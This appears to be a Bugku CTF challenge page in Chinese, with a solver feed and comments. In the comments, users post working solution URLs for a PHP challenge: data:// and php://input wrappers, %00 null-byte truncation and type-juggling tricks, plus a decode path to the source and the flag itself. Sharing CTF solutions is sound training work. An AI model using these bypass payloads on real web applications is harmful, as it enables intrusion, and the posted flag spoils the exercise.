评分(23)
解题动态
Hehe0619 攻破了该题 11小时前
春遇枝庭 攻破了该题 1天前
a1451753998 攻破了该题 1天前
hackerbugku 攻破了该题 3天前
zhuizhui 攻破了该题 3天前
dwx1583 攻破了该题 4天前
qidianzhi 攻破了该题 6天前
mecurio 攻破了该题 7天前
ww__ 攻破了该题 7天前
Future92 攻破了该题 7天前
aaaaab 攻破了该题 8天前
跃迁ctfer 攻破了该题 9天前
千机www 攻破了该题 10天前
cafei2022 攻破了该题 14天前
网络安全亮 攻破了该题 16天前
Da1ly_1upup 攻破了该题 16天前
wzl真帅 攻破了该题 17天前
cs888 攻破了该题 18天前
124要留就要77 攻破了该题 19天前
评论
zhuizhui 3天前
举报
?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14
breeding 1月前
举报
curl '<ip:port>/1p.html'获取到word的值,先url解码,再把解码得到的注释用base64再解一次码就可以得到php源代码了,根据源代码构建url参数:/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20platform!&b=.12345
shingu 3月前
举报
参数b被卡住了。怎么即是4又不能等于4。看了WP才知道,原来是用了%00截断符。
breeding 1月前
举报
也可以直接用“.123456”,因为只截取b的第一个字符接在111的后面当正则模式串,“.”直接通配
ymkiras 3月前
举报
值得注意的是,很多题解bp用的版本有点低,像我用的新版就不能按题解来,所以用data代替input: GET /hello.php?id=0e123456&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111 HTTP/1.1 这里空格用%20代替
ymkiras 3月前
举报
实际上开头的密码我们可以直接用Ctrl+U在源代码页面加上1p.html,即view-source:http//..../1p.html,这样就就不需要跳转bp一直抓包了。
13990684015 4月前
举报
这题太牛逼了
花舞Flower 4月前
举报
什么题做不出来 GET /hello.php?id=0xg&a=php://input&b=%0012345 HTTP/1.1
1969901506 6月前
举报
五边形战士
coldplay99999 8月前
举报
flag{bb25f9ec286ae9753bb12e5631da7f1e}
26ww 8月前
举报
66